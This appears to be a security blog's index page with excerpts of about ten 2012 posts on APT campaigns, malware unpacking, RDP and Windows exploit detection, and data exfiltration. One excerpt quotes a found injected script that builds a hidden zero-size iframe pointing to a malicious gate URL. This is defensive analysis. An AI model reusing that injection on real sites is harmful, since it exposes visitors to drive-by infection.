chackraview.net

Trend Micro blog published a paper titled Luckycat Redux, which looked into the activities of the Luckycat APT campaign.  As per the report, LuckyCat campaign targeted diverse set of industries including Aerospace, Shipping, Energy, Military, Engineering and Tibetan Activist using variety of malwares.  Trend was able to track back the sources of the attack in China. Below [...]

Yesterday I encounter another sample (SHA1: e3a7a9c9a5fcdc0b4bd6ffd9a5b83ba7a22353af) of Dorkbot while analyzing my honeypot. Knowing most of the Dorkbot samples are packed with UPX, I used the upx tool to unpack the binary. However, just to recall my manual steps for unpacking binaries, I thought of writing this post. Let’s use PEiD tool to verify if [...]

The signature specified in the previous entry was for detecting the RCE/DoS attempt within TargetParams structure of RDP protocol. However, a DoS PoC listed here, exploits another MaxParam structure from the same RDP protocol. The PoC is developed by jduck  (Joshua J. Drake) of Accuvant and sets the value of first parameter maxChannelIds to 4294967295. This value is causing [...]

With the release of Exploit PoC code for CVE-2012-0002 by the finder himself has definitely increased the chances of exploitation of this vulnerability. Microsoft has released the patch to address the vulnerability. However, considering the patch deployment life cycle and exploit attempts, we need to be proactive in detection and blocking all the attempts of [...]

 Contagiodump blog published an analysis of a targeted attack using new CVE-2012-0754 exploit. The blog talks about the whole exploit attempt and a great details about the exploit and payload analysis. I will not repeat the analysis in this post but talk about the key points. I liked the adjacent picture posted on contagio blog so [...]

Today, while browsing for some information I ended up landing on a below website. I accidently had my fiddler instance open and saw an embedded iframe in the website.  Here is the snip of the injected iframe. window.setTimeout(function(){ var JSinj=document.createElement(‘iframe’); JSinj.src=’http://unclesammm.com/gate.php?f=873110&r=’+escape(document.referrer||”); JSinj.width=’0′; JSinj.height=’0′; JSinj.frameborder=’0′; JSinj.marginheight=’0′; JSinj.marginwidth=’0′; JSinj.border=’0′; try{ document.body.appendChild(JSinj); }catch(e){ document.documentElement.appendChild(JSinj); Iframe took me to [...]

  Recently, a malware was seen in the wild which grabbed Microsoft Word and Excel files present on the infected system and uploaded them to a free file sharing website sendspace.com. File sharing websites were previously and are still involved in malware drive-by attempts but using them as a data exfiltration channel was seen for [...]

Background: On 31st January 2012, ZScalar and Seculert posted analysis on recently identified RAT malware which is believed to be used in government related targeted attacks. Both of these firms, identified command and control beacon patterns and independently published them on their respective websites. Similar to all the APT attacks, these C&C patterns were built [...]

Very first exploit for the MS12-004 was seen in the wild on last Friday. As soon as the discovery of the exploit attempt was made, researchers were quick to post their analysis on the vulnerability. Metasploit module was also made available to public in its latest revision 14640. In this post I will share a [...]

As ever, the opinions expressed in this website are personal to me and do not necessarily reflect the opinions of my employer. As part of January’s Patch Tuesday, we released 7 patches targeting 8 individual vulnerabilities. Out of these 8 vulnerabilities, I will talk about CVE-2012-0003 – memory corruption vulnerability in Windows Media component that [...]